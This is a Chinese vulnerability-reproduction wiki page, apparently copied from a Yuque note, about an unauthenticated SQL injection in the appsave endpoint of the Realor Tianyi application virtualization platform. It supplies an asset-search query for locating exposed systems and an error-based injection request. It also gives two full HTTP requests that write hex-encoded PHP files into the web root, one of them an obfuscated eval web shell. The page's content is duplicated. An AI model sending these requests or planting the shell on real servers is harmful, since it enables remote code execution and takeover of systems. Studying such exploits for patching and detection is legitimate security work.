fofamini-wiki

登录白背景

源码

瑞友天翼应用虚拟化系统appsave存在SQL注入漏洞

一、漏洞简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权，基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上，客户端通过WEB即可快速安全的访问经服务器上授权的应用软件，实现集中应用、远程接入、协同办公等，从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。瑞友天翼应用虚拟化系统存在SQL注入漏洞，未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码，（该漏洞是通过SQL注入写入后门文件进行代码执行）

二、影响版本

version < 7.0.5.1

三、资产测绘

hunterapp.name="REALOR 瑞友天翼虚拟化平台"
特征

四、漏洞复现

查看版本

/RapAgent.xgi?CMD=GetRegInfo

GET /index.php?s=/Admin/appsave&appid=3%27%29+AND+%28SELECT+2590+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766a71%2C%28SELECT+%28ELT%282590%3D2590%2C1%29%29%29%2C0x7162786271%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+ITBH HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Izntel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: think_language=zh-CN; PHPSESSID=qlg6b8j8gnd7lbu535e1h3rd02
Upgrade-Insecure-Requests: 1

/index.php?s=/Admin/appsave&appid=3

ruiyou_appsave_sqli.yaml
写shell

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f70687020706870696e666f28293b3f3e%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cpoc2.php%27%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Izntel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: think_language=zh-CN; PHPSESSID=qlg6b8j8gnd7lbu535e1h3rd02
Upgrade-Insecure-Requests: 1

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f70687020636c617373204736736148764732207b207075626c69632066756e6374696f6e205f5f636f6e7374727563742824485a393375297b20406576616c28222f2a5a6c3932434e4b3048572a2f222e24485a3933752e222f2a5a6c3932434e4b3048572a2f22293b207d7d6e657720473673614876473228245f524551554553545b2778275d293b3f3e%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cpoc.php%27%23HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Izntel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: think_language=zh-CN; PHPSESSID=qlg6b8j8gnd7lbu535e1h3rd02
Upgrade-Insecure-Requests: 1

原文: https://www.yuque.com/xiaokp7/ocvun2/hnxw9x4zn6qbu5ix

# 瑞友天翼应用虚拟化系统appsave存在SQL注入漏洞

# 一、漏洞简介
 瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权，基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上，客户端通过WEB即可快速安全的访问经服务器上授权的应用软件，实现集中应用、远程接入、协同办公等，从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。瑞友天翼应用虚拟化系统存在SQL注入漏洞，未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码，（该漏洞是通过SQL注入写入后门文件进行代码执行）

# 二、影响版本

- version < 7.0.5.1

# 三、资产测绘

- hunter`app.name="REALOR 瑞友天翼虚拟化平台"`
- 特征

![image.png](./img/rh8pdfzq_FultX1x/1715088440425-d9efa71b-002c-4031-918b-eba1c9c722e0-917208.png)

# 四、漏洞复现
查看版本
```
/RapAgent.xgi?CMD=GetRegInfo
```
![image.png](./img/rh8pdfzq_FultX1x/1715091007399-91f05081-d939-4e7a-82e9-d14deb26696e-327240.png)
```
GET /index.php?s=/Admin/appsave&appid=3%27%29+AND+%28SELECT+2590+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766a71%2C%28SELECT+%28ELT%282590%3D2590%2C1%29%29%29%2C0x7162786271%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+ITBH HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Izntel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: think_language=zh-CN; PHPSESSID=qlg6b8j8gnd7lbu535e1h3rd02
Upgrade-Insecure-Requests: 1
```
![image.png](./img/rh8pdfzq_FultX1x/1715088465175-5382aaab-d4ad-424b-98fc-e3cf2fe6c7f7-864038.png)
```
/index.php?s=/Admin/appsave&appid=3
```
![image.png](./img/rh8pdfzq_FultX1x/1715088756937-fcff0b0b-9911-49a0-b111-ee48dcbd7085-653657.png)
[ruiyou_appsave_sqli.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1715224885949-311c1051-e7f4-4473-b20b-8404ee24a894.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F29512878%2F1715224885949-311c1051-e7f4-4473-b20b-8404ee24a894.yaml%22%2C%22name%22%3A%22ruiyou_appsave_sqli.yaml%22%2C%22size%22%3A1101%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22ud60ed757-6e0f-4a20-8907-e9edd096513%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22ua5acd2f8%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
写shell
```
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f70687020706870696e666f28293b3f3e%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cpoc2.php%27%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Izntel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: think_language=zh-CN; PHPSESSID=qlg6b8j8gnd7lbu535e1h3rd02
Upgrade-Insecure-Requests: 1
```
![image.png](./img/rh8pdfzq_FultX1x/1715090919755-84d60115-a578-48e9-aab4-13985865c958-249774.png)
![image.png](./img/rh8pdfzq_FultX1x/1715091736249-281d1b06-5285-4469-9a53-25aedb21632d-851174.png)
```
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f70687020636c617373204736736148764732207b207075626c69632066756e6374696f6e205f5f636f6e7374727563742824485a393375297b20406576616c28222f2a5a6c3932434e4b3048572a2f222e24485a3933752e222f2a5a6c3932434e4b3048572a2f22293b207d7d6e657720473673614876473228245f524551554553545b2778275d293b3f3e%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cpoc.php%27%23HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Izntel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: think_language=zh-CN; PHPSESSID=qlg6b8j8gnd7lbu535e1h3rd02
Upgrade-Insecure-Requests: 1
```
![image.png](./img/rh8pdfzq_FultX1x/1715091713903-ce8f699a-51e1-4f0e-ab3a-1f87c84b9a85-169581.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hnxw9x4zn6qbu5ix>